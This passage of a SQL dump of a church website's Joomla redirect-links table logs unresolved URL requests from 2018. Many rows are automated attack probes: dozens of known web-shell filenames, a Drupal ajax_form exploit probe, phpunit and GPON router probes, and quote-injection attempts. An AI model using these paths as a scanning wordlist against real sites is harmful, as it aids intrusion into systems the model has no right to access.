(8719, 'https://lifeoasisinternationalchurch.org/loicforum/archive/', NULL, 'https://lifeoasisinternationalchurch.org/loicforum/archive/', '', 16, 0, '2018-09-05 12:14:28', '0000-00-00 00:00:00', 301),
(8720, 'https://lifeoasisinternationalchurch.org/installer.php', NULL, 'http://lifeoasisinternationalchurch.org/installer.php', '', 20, 0, '2018-09-05 15:48:12', '0000-00-00 00:00:00', 301),
(8721, 'https://lifeoasisinternationalchurch.org/installer-backup.php', NULL, 'http://lifeoasisinternationalchurch.org/installer-backup.php', '', 34, 0, '2018-09-05 15:48:13', '0000-00-00 00:00:00', 301),
(8722, 'https://lifeoasisinternationalchurch.org/streamimg', NULL, '', '', 4, 0, '2018-09-05 17:41:15', '0000-00-00 00:00:00', 301),
(8723, 'https://www.lifeoasisinternationalchurch.org//privatestreaming', NULL, '', '', 1, 0, '2018-09-08 11:06:05', '0000-00-00 00:00:00', 301),
(8724, 'https://142.4.21.132/user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_aja', NULL, '', '', 4, 0, '2018-09-08 23:03:13', '0000-00-00 00:00:00', 301),
(8725, 'https://lifeoasisinternationalchurch.org/resources/vod', NULL, '', '', 154, 0, '2018-09-10 23:52:49', '0000-00-00 00:00:00', 301),
(8726, 'https://lifeoasisinternationalchurch.org/pfgpweynm', NULL, 'http://goodluck.net.ru/', '', 1, 0, '2018-09-11 20:02:48', '0000-00-00 00:00:00', 301),
(8727, 'https://lifeoasisinternationalchurch.org/vagrantfile', NULL, '', '', 1, 0, '2018-09-12 00:51:14', '0000-00-00 00:00:00', 301),
(8728, 'https://www.lifeoasisinternationalchurch.org/vagrantfile', NULL, '', '', 1, 0, '2018-09-12 00:51:16', '0000-00-00 00:00:00', 301),
(8729, 'https://www.lifeoasisinternationalchurch.org/asom-2014-online-registration', NULL, '', '', 10, 0, '2018-09-13 11:17:15', '0000-00-00 00:00:00', 301),
(8730, 'https://lifeoasisinternationalchurch.org/component/users/?itemid=\"\'&view=\"\'', NULL, '', '', 1, 0, '2018-09-13 14:32:01', '0000-00-00 00:00:00', 301),
(8731, 'https://lifeoasisinternationalchurch.org/\"\'/testimonies', NULL, '', '', 1, 0, '2018-09-13 14:32:01', '0000-00-00 00:00:00', 301),
(8732, 'https://lifeoasisinternationalchurch.org/\"\'', NULL, '', '', 1, 0, '2018-09-13 14:32:01', '0000-00-00 00:00:00', 301),
(8733, 'https://lifeoasisinternationalchurch.org/\"\'/\"\'', NULL, '', '', 1, 0, '2018-09-13 14:32:01', '0000-00-00 00:00:00', 301),
(8734, 'https://lifeoasisinternationalchurch.org/resources/\"\'', NULL, '', '', 1, 0, '2018-09-13 14:32:02', '0000-00-00 00:00:00', 301),
(8735, 'https://lifeoasisinternationalchurch.org/partnership/\"\'', NULL, '', '', 1, 0, '2018-09-13 14:32:02', '0000-00-00 00:00:00', 301),
(8736, 'https://lifeoasisinternationalchurch.org/\"\'/ordained', NULL, '', '', 1, 0, '2018-09-13 14:32:02', '0000-00-00 00:00:00', 301),
(8737, 'https://lifeoasisinternationalchurch.org/resources/blog/item/\"\'', NULL, '', '', 1, 0, '2018-09-13 14:32:02', '0000-00-00 00:00:00', 301),
(8738, 'https://142.4.21.132/nmaplowercheck1536863133', NULL, '', '', 1, 0, '2018-09-13 18:25:34', '0000-00-00 00:00:00', 301),
(8739, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticketa&requestdata=[{\"train_date\":\"20180921\",\"purpose_codes\":\"00\",\"from_station\":\"szh\",\"to_station\":\"csq\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"c9e913ac5ded2e16163416e2eb761e9f\",\"device_no\":\"722700de0734525a16fcc5615ce55865\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20180914132229\",\"user_name\":\"\",\"version_no\":\"4.0.0.07121250\"}}]&ts=1536902549575&sign=', NULL, '', '', 1, 0, '2018-09-14 05:22:28', '0000-00-00 00:00:00', 301),
(8740, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticketa&requestdata=[{\"train_date\":\"20180921\",\"purpose_codes\":\"00\",\"from_station\":\"szh\",\"to_station\":\"csq\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"480cb164898736527532aa6e288533a6\",\"device_no\":\"da013c491b2dd5a6e62684297aa696dd\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20180914183818\",\"user_name\":\"\",\"version_no\":\"4.0.0.07121250\"}}]&ts=1536921498187&sign=', NULL, '', '', 1, 0, '2018-09-14 10:38:17', '0000-00-00 00:00:00', 301),
(8741, 'https://www.lifeoasisinternationalchurch.org/vendor/phpunit/phpunit/src/util/php/asd.php', NULL, '', '', 1, 0, '2018-09-14 18:26:57', '0000-00-00 00:00:00', 301),
(8742, 'https://www.lifeoasisinternationalchurch.org/search.php', NULL, '', '', 1, 0, '2018-09-14 18:27:07', '0000-00-00 00:00:00', 301),
(8743, 'https://142.4.21.132/client/en/community/supportcli.php', NULL, '', '', 1, 0, '2018-09-14 21:21:06', '0000-00-00 00:00:00', 301),
(8744, 'https://142.4.21.132/manager/html', NULL, '', '', 3, 0, '2018-09-17 04:52:39', '0000-00-00 00:00:00', 301),
(8745, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy+spirit', NULL, '', '', 1, 0, '2018-09-18 17:37:36', '0000-00-00 00:00:00', 301),
(8746, 'https://www.lifeoasisinternationalchurch.org/resources/live-streamin', NULL, '', '', 3, 0, '2018-09-19 05:01:14', '0000-00-00 00:00:00', 301),
(8747, 'https://lifeoasisinternationalchurch.org/sdfbfsbsdfbsdbsd', NULL, '', '', 1, 0, '2018-09-20 02:42:14', '0000-00-00 00:00:00', 301),
(8748, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct+christian', NULL, '', '', 6, 0, '2018-09-20 07:58:57', '0000-00-00 00:00:00', 301),
(8749, 'https://lifeoasisinternationalchurch.org/wallet/', NULL, '', '', 7, 0, '2018-09-20 17:16:35', '0000-00-00 00:00:00', 301),
(8750, 'https://www.lifeoasisinternationalchurch.org/shell.php', NULL, '', '', 1, 0, '2018-09-21 06:32:26', '0000-00-00 00:00:00', 301),
(8751, 'https://lifeoasisinternationalchurch.org/about.php', NULL, '', '', 5, 0, '2018-09-21 07:49:43', '0000-00-00 00:00:00', 301),
(8752, 'https://www.lifeoasisinternationalchurch.org/streaming⠀', NULL, '', '', 8, 0, '2018-09-21 08:29:34', '0000-00-00 00:00:00', 301),
(8753, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/63199', NULL, '', '', 1, 0, '2018-09-21 13:17:19', '0000-00-00 00:00:00', 301),
(8754, 'https://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392', NULL, 'http://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392', '', 2, 0, '2018-09-24 13:47:05', '0000-00-00 00:00:00', 301),
(8755, 'https://lifeoasisinternationalchurch.org/struts_stru', NULL, '', '', 2, 0, '2018-09-25 21:03:17', '0000-00-00 00:00:00', 301),
(8756, 'https://192.168.0.1:443/gponform/diag_form?style/', NULL, '', '', 5, 0, '2018-09-27 01:55:57', '0000-00-00 00:00:00', 301),
(8757, 'https://lifeoasisinternationalchurch.org/resources/live-stre', NULL, '', '', 1, 0, '2018-09-28 22:05:34', '0000-00-00 00:00:00', 301),
(8758, 'https://lifeoasisinternationalchurch.org/bak.php?login=canshu?', NULL, '', '', 2, 0, '2018-09-28 22:28:37', '0000-00-00 00:00:00', 301),
(8759, 'https://lifeoasisinternationalchurch.org/resources/live-streaming/finance convention', NULL, '', '', 1, 0, '2018-09-29 09:01:35', '0000-00-00 00:00:00', 301),
(8760, 'https://lifeoasisinternationalchurch.org/qq.php', NULL, '', '', 1, 0, '2018-09-29 09:50:42', '0000-00-00 00:00:00', 301),
(8761, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=5byfgtsrgx8', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 4, 0, '2018-09-30 05:53:30', '0000-00-00 00:00:00', 301),
(8762, 'https://lifeoasisinternationalchurch.org/wifizion//component/user/register', NULL, 'http://lifeoasisinternationalchurch.org/wifizion/index.php/component/content/category/18-wifi-zion', '', 2, 0, '2018-09-30 09:42:54', '0000-00-00 00:00:00', 301),
(8763, 'https://lifeoasisinternationalchurch.org/user/register', NULL, 'http://lifeoasisinternationalchurch.org/wifizion/index.php/component/content/category/18-wifi-zion', '', 8, 0, '2018-09-30 09:42:58', '0000-00-00 00:00:00', 301),
(8764, 'https://www.lifeoasisinternationalchurch.org/sh.phpshell.php', NULL, '', '', 1, 0, '2018-09-30 19:32:04', '0000-00-00 00:00:00', 301),
(8765, 'https://www.lifeoasisinternationalchurch.org/zf.php', NULL, '', '', 2, 0, '2018-09-30 20:13:05', '0000-00-00 00:00:00', 301),
(8766, 'https://www.lifeoasisinternationalchurch.org/xc.php', NULL, '', '', 2, 0, '2018-09-30 20:33:19', '0000-00-00 00:00:00', 301),
(8767, 'https://www.lifeoasisinternationalchurch.org/sz.php', NULL, '', '', 2, 0, '2018-09-30 20:53:49', '0000-00-00 00:00:00', 301),
(8768, 'https://www.lifeoasisinternationalchurch.org/rd.php', NULL, '', '', 2, 0, '2018-09-30 21:34:47', '0000-00-00 00:00:00', 301),
(8769, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=9lnxmbz6fme', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-09-30 21:43:15', '0000-00-00 00:00:00', 301),
(8770, 'https://www.lifeoasisinternationalchurch.org/rm.php', NULL, '', '', 2, 0, '2018-09-30 21:55:07', '0000-00-00 00:00:00', 301),
(8771, 'https://lifeoasisinternationalchurch.org/status?full', NULL, '', '', 6, 0, '2018-10-01 03:09:53', '0000-00-00 00:00:00', 301),
(8772, 'https://www.lifeoasisinternationalchurch.org/kj.php', NULL, '', '', 3, 0, '2018-10-01 04:48:18', '0000-00-00 00:00:00', 301),
(8773, 'https://www.lifeoasisinternationalchurch.org/tu.php', NULL, '', '', 3, 0, '2018-10-01 05:40:22', '0000-00-00 00:00:00', 301),
(8774, 'https://www.lifeoasisinternationalchurch.org/la.php', NULL, '', '', 3, 0, '2018-10-01 06:06:36', '0000-00-00 00:00:00', 301),
(8775, 'https://lifeoasisinternationalchurch.org/vb/', NULL, '', '', 1, 0, '2018-10-03 15:57:00', '0000-00-00 00:00:00', 301),
(8776, 'https://lifeoasisinternationalchurch.org/forum/forum.php', NULL, '', '', 1, 0, '2018-10-03 15:57:04', '0000-00-00 00:00:00', 301),
(8777, 'https://lifeoasisinternationalchurch.org/community/forum/', NULL, '', '', 1, 0, '2018-10-03 15:57:07', '0000-00-00 00:00:00', 301),
(8778, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 6, 0, '2018-10-03 16:59:56', '0000-00-00 00:00:00', 301),
(8779, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=vrddf24cdy4', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 3, 0, '2018-10-03 22:55:25', '0000-00-00 00:00:00', 301),
(8780, 'https://www.lifeoasisinternationalchurch.org/529.php', NULL, '', '', 1, 0, '2018-10-04 19:16:45', '0000-00-00 00:00:00', 301),
(8781, 'https://www.lifeoasisinternationalchurch.org/accept.php', NULL, '', '', 1, 0, '2018-10-04 19:26:26', '0000-00-00 00:00:00', 301),
(8782, 'https://www.lifeoasisinternationalchurch.org/ajax.php', NULL, '', '', 1, 0, '2018-10-04 19:36:00', '0000-00-00 00:00:00', 301),
(8783, 'https://www.lifeoasisinternationalchurch.org/ak.php', NULL, '', '', 3, 0, '2018-10-04 19:45:33', '0000-00-00 00:00:00', 301),
(8784, 'https://www.lifeoasisinternationalchurch.org/antichat.php', NULL, '', '', 1, 0, '2018-10-04 19:55:09', '0000-00-00 00:00:00', 301),
(8785, 'https://www.lifeoasisinternationalchurch.org/aspydrv.php', NULL, '', '', 1, 0, '2018-10-04 20:04:48', '0000-00-00 00:00:00', 301),
(8786, 'https://www.lifeoasisinternationalchurch.org/ayyildiz.php', NULL, '', '', 1, 0, '2018-10-04 20:14:28', '0000-00-00 00:00:00', 301),
(8787, 'https://www.lifeoasisinternationalchurch.org/azrailphp.php', NULL, '', '', 1, 0, '2018-10-04 20:24:08', '0000-00-00 00:00:00', 301),
(8788, 'https://www.lifeoasisinternationalchurch.org/b374k.php', NULL, '', '', 1, 0, '2018-10-04 20:33:42', '0000-00-00 00:00:00', 301),
(8789, 'https://www.lifeoasisinternationalchurch.org/backupsql.php', NULL, '', '', 1, 0, '2018-10-04 20:43:13', '0000-00-00 00:00:00', 301),
(8790, 'https://www.lifeoasisinternationalchurch.org/c0derz.php', NULL, '', '', 1, 0, '2018-10-04 20:52:50', '0000-00-00 00:00:00', 301),
(8791, 'https://www.lifeoasisinternationalchurch.org/casus.php', NULL, '', '', 1, 0, '2018-10-04 21:20:26', '0000-00-00 00:00:00', 301),
(8792, 'https://www.lifeoasisinternationalchurch.org/cmdasp.php', NULL, '', '', 1, 0, '2018-10-04 21:30:04', '0000-00-00 00:00:00', 301),
(8793, 'https://www.lifeoasisinternationalchurch.org/cpanel.php', NULL, '', '', 1, 0, '2018-10-04 21:39:41', '0000-00-00 00:00:00', 301),
(8794, 'https://www.lifeoasisinternationalchurch.org/crystalshell.php', NULL, '', '', 1, 0, '2018-10-04 21:49:20', '0000-00-00 00:00:00', 301),
(8795, 'https://www.lifeoasisinternationalchurch.org/cw.php', NULL, '', '', 3, 0, '2018-10-04 21:58:55', '0000-00-00 00:00:00', 301),
(8796, 'https://www.lifeoasisinternationalchurch.org/cyber.php', NULL, '', '', 1, 0, '2018-10-04 22:08:26', '0000-00-00 00:00:00', 301),
(8797, 'https://lifeoasisinternationalchurch.org/null?callback=__twttr.callbacks.cb0&ids=876390117849665537&lang=en&suppress_response_codes=true&theme=light&tz=gmt-0700', NULL, 'https://lifeoasisinternationalchurch.org/periscope', '', 1, 0, '2018-10-04 22:09:02', '0000-00-00 00:00:00', 301),
(8798, 'https://www.lifeoasisinternationalchurch.org/cybershell.php', NULL, '', '', 1, 0, '2018-10-04 22:17:58', '0000-00-00 00:00:00', 301),
(8799, 'https://www.lifeoasisinternationalchurch.org/dc3.php', NULL, '', '', 1, 0, '2018-10-04 22:27:34', '0000-00-00 00:00:00', 301),
(8800, 'https://www.lifeoasisinternationalchurch.org/dive.php', NULL, '', '', 1, 0, '2018-10-04 22:37:05', '0000-00-00 00:00:00', 301),
(8801, 'https://www.lifeoasisinternationalchurch.org/dtool.php', NULL, '', '', 1, 0, '2018-10-04 22:46:38', '0000-00-00 00:00:00', 301),
(8802, 'https://www.lifeoasisinternationalchurch.org/erne.php', NULL, '', '', 1, 0, '2018-10-04 22:56:13', '0000-00-00 00:00:00', 301),
(8803, 'https://www.lifeoasisinternationalchurch.org/ex0shell.php', NULL, '', '', 1, 0, '2018-10-04 23:05:46', '0000-00-00 00:00:00', 301),
(8804, 'https://www.lifeoasisinternationalchurch.org/fatal.php', NULL, '', '', 1, 0, '2018-10-04 23:15:21', '0000-00-00 00:00:00', 301),
(8805, 'https://www.lifeoasisinternationalchurch.org/ftpsearch.php', NULL, '', '', 1, 0, '2018-10-04 23:24:55', '0000-00-00 00:00:00', 301),
(8806, 'https://www.lifeoasisinternationalchurch.org/g00nshell.php', NULL, '', '', 1, 0, '2018-10-04 23:34:31', '0000-00-00 00:00:00', 301),
(8807, 'https://www.lifeoasisinternationalchurch.org/gamma.php', NULL, '', '', 1, 0, '2018-10-04 23:44:08', '0000-00-00 00:00:00', 301),
(8808, 'https://www.lifeoasisinternationalchurch.org/gfs.php', NULL, '', '', 1, 0, '2018-10-04 23:53:45', '0000-00-00 00:00:00', 301),
(8809, 'https://www.lifeoasisinternationalchurch.org/go.php', NULL, '', '', 3, 0, '2018-10-05 00:03:14', '0000-00-00 00:00:00', 301),
(8810, 'https://www.lifeoasisinternationalchurch.org/grp.php', NULL, '', '', 1, 0, '2018-10-05 00:12:43', '0000-00-00 00:00:00', 301),
(8811, 'https://www.lifeoasisinternationalchurch.org/h4ntu.php', NULL, '', '', 1, 0, '2018-10-05 00:22:19', '0000-00-00 00:00:00', 301),
(8812, 'https://www.lifeoasisinternationalchurch.org/hiddens.php', NULL, '', '', 1, 0, '2018-10-05 00:31:57', '0000-00-00 00:00:00', 301),
(8813, 'https://www.lifeoasisinternationalchurch.org/indexer.php', NULL, '', '', 1, 0, '2018-10-05 00:41:35', '0000-00-00 00:00:00', 301),
(8814, 'https://www.lifeoasisinternationalchurch.org/ironshell.php', NULL, '', '', 1, 0, '2018-10-05 00:51:14', '0000-00-00 00:00:00', 301),
(8815, 'https://www.lifeoasisinternationalchurch.org/jspwebshell.php', NULL, '', '', 1, 0, '2018-10-05 01:00:51', '0000-00-00 00:00:00', 301),
(8816, 'https://www.lifeoasisinternationalchurch.org/ka.php', NULL, '', '', 3, 0, '2018-10-05 01:10:19', '0000-00-00 00:00:00', 301),
(8817, 'https://www.lifeoasisinternationalchurch.org/kadot.php', NULL, '', '', 1, 0, '2018-10-05 01:19:51', '0000-00-00 00:00:00', 301),
(8818, 'https://www.lifeoasisinternationalchurch.org/klasvayv.php', NULL, '', '', 1, 0, '2018-10-05 01:29:31', '0000-00-00 00:00:00', 301),
(8819, 'https://www.lifeoasisinternationalchurch.org/kral.php', NULL, '', '', 1, 0, '2018-10-05 01:39:10', '0000-00-00 00:00:00', 301),
(8820, 'https://www.lifeoasisinternationalchurch.org/lamashell.php', NULL, '', '', 1, 0, '2018-10-05 01:48:51', '0000-00-00 00:00:00', 301),
(8821, 'https://www.lifeoasisinternationalchurch.org/lifkas.php', NULL, '', '', 1, 0, '2018-10-05 01:58:30', '0000-00-00 00:00:00', 301),
(8822, 'https://www.lifeoasisinternationalchurch.org/liz0zim.php', NULL, '', '', 1, 0, '2018-10-05 02:08:08', '0000-00-00 00:00:00', 301),
(8823, 'https://www.lifeoasisinternationalchurch.org/load.php', NULL, '', '', 1, 0, '2018-10-05 02:17:44', '0000-00-00 00:00:00', 301),
(8824, 'https://www.lifeoasisinternationalchurch.org/loaderz.php', NULL, '', '', 1, 0, '2018-10-05 02:27:17', '0000-00-00 00:00:00', 301),
(8825, 'https://www.lifeoasisinternationalchurch.org/lolipop.php', NULL, '', '', 1, 0, '2018-10-05 02:36:57', '0000-00-00 00:00:00', 301),
(8826, 'https://www.lifeoasisinternationalchurch.org/lostdc.php', NULL, '', '', 1, 0, '2018-10-05 02:46:33', '0000-00-00 00:00:00', 301),
(8827, 'https://www.lifeoasisinternationalchurch.org/macker.php', NULL, '', '', 1, 0, '2018-10-05 02:56:11', '0000-00-00 00:00:00', 301),
(8828, 'https://www.lifeoasisinternationalchurch.org/matamu.php', NULL, '', '', 1, 0, '2018-10-05 03:05:48', '0000-00-00 00:00:00', 301),
(8829, 'https://www.lifeoasisinternationalchurch.org/megabor.php', NULL, '', '', 1, 0, '2018-10-05 03:15:26', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(8830, 'https://www.lifeoasisinternationalchurch.org/moroccan.php', NULL, '', '', 1, 0, '2018-10-05 03:25:02', '0000-00-00 00:00:00', 301),
(8831, 'https://www.lifeoasisinternationalchurch.org/myshell.php', NULL, '', '', 1, 0, '2018-10-05 03:34:35', '0000-00-00 00:00:00', 301),
(8832, 'https://www.lifeoasisinternationalchurch.org/mysql.php', NULL, '', '', 1, 0, '2018-10-05 03:44:14', '0000-00-00 00:00:00', 301),
(8833, 'https://www.lifeoasisinternationalchurch.org/ncc.php', NULL, '', '', 1, 0, '2018-10-05 03:53:53', '0000-00-00 00:00:00', 301),
(8834, 'https://www.lifeoasisinternationalchurch.org/ngh.php', NULL, '', '', 1, 0, '2018-10-05 04:03:27', '0000-00-00 00:00:00', 301),
(8835, 'https://www.lifeoasisinternationalchurch.org/non.php', NULL, '', '', 1, 0, '2018-10-05 04:13:02', '0000-00-00 00:00:00', 301),
(8836, 'https://www.lifeoasisinternationalchurch.org/nshell.php', NULL, '', '', 1, 0, '2018-10-05 04:22:23', '0000-00-00 00:00:00', 301),
(8837, 'https://www.lifeoasisinternationalchurch.org/ntdaddy.php', NULL, '', '', 1, 0, '2018-10-05 04:31:41', '0000-00-00 00:00:00', 301),
(8838, 'https://www.lifeoasisinternationalchurch.org/ph.php', NULL, '', '', 3, 0, '2018-10-05 04:41:01', '0000-00-00 00:00:00', 301),
(8839, 'https://www.lifeoasisinternationalchurch.org/phantasma.php', NULL, '', '', 1, 0, '2018-10-05 04:50:35', '0000-00-00 00:00:00', 301),
(8840, 'https://www.lifeoasisinternationalchurch.org/php.php', NULL, '', '', 1, 0, '2018-10-05 05:00:11', '0000-00-00 00:00:00', 301),
(8841, 'https://www.lifeoasisinternationalchurch.org/phpinj.php', NULL, '', '', 1, 0, '2018-10-05 05:09:50', '0000-00-00 00:00:00', 301),
(8842, 'https://www.lifeoasisinternationalchurch.org/phpspy.php', NULL, '', '', 1, 0, '2018-10-05 05:29:04', '0000-00-00 00:00:00', 301),
(8843, 'https://www.lifeoasisinternationalchurch.org/phvayv.php', NULL, '', '', 1, 0, '2018-10-05 05:38:43', '0000-00-00 00:00:00', 301),
(8844, 'https://www.lifeoasisinternationalchurch.org/predator.php', NULL, '', '', 1, 0, '2018-10-05 05:48:20', '0000-00-00 00:00:00', 301),
(8845, 'https://www.lifeoasisinternationalchurch.org/pws.php', NULL, '', '', 1, 0, '2018-10-05 05:57:54', '0000-00-00 00:00:00', 301),
(8846, 'https://www.lifeoasisinternationalchurch.org/qsd.php', NULL, '', '', 1, 0, '2018-10-05 06:07:31', '0000-00-00 00:00:00', 301),
(8847, 'https://www.lifeoasisinternationalchurch.org/reader.php', NULL, '', '', 1, 0, '2018-10-05 06:17:07', '0000-00-00 00:00:00', 301),
(8848, 'https://www.lifeoasisinternationalchurch.org/remexp.php', NULL, '', '', 1, 0, '2018-10-05 06:26:42', '0000-00-00 00:00:00', 301),
(8849, 'https://www.lifeoasisinternationalchurch.org/robots.php', NULL, '', '', 1, 0, '2018-10-05 06:36:13', '0000-00-00 00:00:00', 301),
(8850, 'https://www.lifeoasisinternationalchurch.org/rootshell.php', NULL, '', '', 1, 0, '2018-10-05 06:45:43', '0000-00-00 00:00:00', 301),
(8851, 'https://www.lifeoasisinternationalchurch.org/ru24.php', NULL, '', '', 1, 0, '2018-10-05 06:55:14', '0000-00-00 00:00:00', 301),
(8852, 'https://www.lifeoasisinternationalchurch.org/s72.php', NULL, '', '', 1, 0, '2018-10-05 07:04:35', '0000-00-00 00:00:00', 301),
(8853, 'https://www.lifeoasisinternationalchurch.org/safe.php', NULL, '', '', 1, 0, '2018-10-05 07:13:55', '0000-00-00 00:00:00', 301),
(8854, 'https://www.lifeoasisinternationalchurch.org/safe0ver.php', NULL, '', '', 1, 0, '2018-10-05 07:23:27', '0000-00-00 00:00:00', 301),
(8855, 'https://www.lifeoasisinternationalchurch.org/simattacker.php', NULL, '', '', 1, 0, '2018-10-05 07:33:06', '0000-00-00 00:00:00', 301),
(8856, 'https://www.lifeoasisinternationalchurch.org/simple.php', NULL, '', '', 1, 0, '2018-10-05 07:42:39', '0000-00-00 00:00:00', 301),
(8857, 'https://www.lifeoasisinternationalchurch.org/simshell.php', NULL, '', '', 1, 0, '2018-10-05 07:52:14', '0000-00-00 00:00:00', 301),
(8858, 'https://www.lifeoasisinternationalchurch.org/sincap.php', NULL, '', '', 1, 0, '2018-10-05 08:01:54', '0000-00-00 00:00:00', 301),
(8859, 'https://www.lifeoasisinternationalchurch.org/small.php', NULL, '', '', 1, 0, '2018-10-05 08:11:26', '0000-00-00 00:00:00', 301),
(8860, 'https://www.lifeoasisinternationalchurch.org/soldierofallah.php', NULL, '', '', 1, 0, '2018-10-05 08:21:19', '0000-00-00 00:00:00', 301),
(8861, 'https://www.lifeoasisinternationalchurch.org/sosyete.php', NULL, '', '', 1, 0, '2018-10-05 08:30:59', '0000-00-00 00:00:00', 301),
(8862, 'https://www.lifeoasisinternationalchurch.org/spygrup.php', NULL, '', '', 1, 0, '2018-10-05 08:40:37', '0000-00-00 00:00:00', 301),
(8863, 'https://www.lifeoasisinternationalchurch.org/stnc.php', NULL, '', '', 1, 0, '2018-10-05 08:50:17', '0000-00-00 00:00:00', 301),
(8864, 'https://www.lifeoasisinternationalchurch.org/stres.php', NULL, '', '', 1, 0, '2018-10-05 08:59:51', '0000-00-00 00:00:00', 301),
(8865, 'https://www.lifeoasisinternationalchurch.org/toolaspshell.php', NULL, '', '', 1, 0, '2018-10-05 09:09:26', '0000-00-00 00:00:00', 301),
(8866, 'https://www.lifeoasisinternationalchurch.org/tryag.php', NULL, '', '', 1, 0, '2018-10-05 09:19:04', '0000-00-00 00:00:00', 301),
(8867, 'https://www.lifeoasisinternationalchurch.org/uploader.php', NULL, '', '', 1, 0, '2018-10-05 09:28:41', '0000-00-00 00:00:00', 301),
(8868, 'https://www.lifeoasisinternationalchurch.org/web.php', NULL, '', '', 1, 0, '2018-10-05 09:38:13', '0000-00-00 00:00:00', 301),
(8869, 'https://www.lifeoasisinternationalchurch.org/winx.php', NULL, '', '', 1, 0, '2018-10-05 09:47:44', '0000-00-00 00:00:00', 301),
(8870, 'https://www.lifeoasisinternationalchurch.org/worse.php', NULL, '', '', 1, 0, '2018-10-05 09:57:19', '0000-00-00 00:00:00', 301),
(8871, 'https://www.lifeoasisinternationalchurch.org/zaco.php', NULL, '', '', 1, 0, '2018-10-05 10:16:31', '0000-00-00 00:00:00', 301),
(8872, 'https://www.lifeoasisinternationalchurch.org/zacosmall.php', NULL, '', '', 1, 0, '2018-10-05 10:26:09', '0000-00-00 00:00:00', 301),
(8873, 'https://www.lifeoasisinternationalchurch.org/zehir4.php', NULL, '', '', 1, 0, '2018-10-05 10:35:48', '0000-00-00 00:00:00', 301),
(8874, 'https://www.lifeoasisinternationalchurch.org/zyklonshell.php', NULL, '', '', 1, 0, '2018-10-05 10:45:25', '0000-00-00 00:00:00', 301),
(8875, 'https://www.lifeoasisinternationalchurch.org/index.php/null?callback=__twttr.callbacks.cb0&ids=856034041618980864-t&lang=en&suppress_response_codes=true&theme=light&tz=gmt-0700', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php/109-prayer-focus-for-day-33', '', 1, 0, '2018-10-05 10:52:25', '0000-00-00 00:00:00', 301),
(8876, 'https://www.lifeoasisinternationalchurch.org/5.php', NULL, '', '', 2, 0, '2018-10-05 10:55:03', '0000-00-00 00:00:00', 301),
(8877, 'https://www.lifeoasisinternationalchurch.org/a.php', NULL, '', '', 2, 0, '2018-10-05 11:04:19', '0000-00-00 00:00:00', 301),
(8878, 'https://www.lifeoasisinternationalchurch.org/b.php', NULL, '', '', 2, 0, '2018-10-05 11:13:33', '0000-00-00 00:00:00', 301),
(8879, 'https://lifeoasisinternationalchurch.org/null?callback=__twttr.callbacks.cb0&ids=876390117849665537&lang=en&suppress_response_codes=true&theme=light&tz=gmt+0100', NULL, 'https://lifeoasisinternationalchurch.org/periscope', '', 31, 0, '2018-10-05 11:15:08', '0000-00-00 00:00:00', 301),
(8880, 'https://www.lifeoasisinternationalchurch.org/c.php', NULL, '', '', 2, 0, '2018-10-05 11:22:47', '0000-00-00 00:00:00', 301),
(8881, 'https://www.lifeoasisinternationalchurch.org/d.php', NULL, '', '', 2, 0, '2018-10-05 11:31:58', '0000-00-00 00:00:00', 301),
(8882, 'https://www.lifeoasisinternationalchurch.org/e.php', NULL, '', '', 2, 0, '2018-10-05 11:41:18', '0000-00-00 00:00:00', 301),
(8883, 'https://www.lifeoasisinternationalchurch.org/f.php', NULL, '', '', 2, 0, '2018-10-05 11:50:41', '0000-00-00 00:00:00', 301),
(8884, 'https://www.lifeoasisinternationalchurch.org/g.php', NULL, '', '', 2, 0, '2018-10-05 11:59:59', '0000-00-00 00:00:00', 301),
(8885, 'https://www.lifeoasisinternationalchurch.org/h.php', NULL, '', '', 2, 0, '2018-10-05 12:09:20', '0000-00-00 00:00:00', 301),
(8886, 'https://www.lifeoasisinternationalchurch.org/j.php', NULL, '', '', 2, 0, '2018-10-05 12:27:47', '0000-00-00 00:00:00', 301),
(8887, 'https://www.lifeoasisinternationalchurch.org/k.php', NULL, '', '', 2, 0, '2018-10-05 12:37:08', '0000-00-00 00:00:00', 301),
(8888, 'https://www.lifeoasisinternationalchurch.org/l.php', NULL, '', '', 2, 0, '2018-10-05 12:46:27', '0000-00-00 00:00:00', 301),
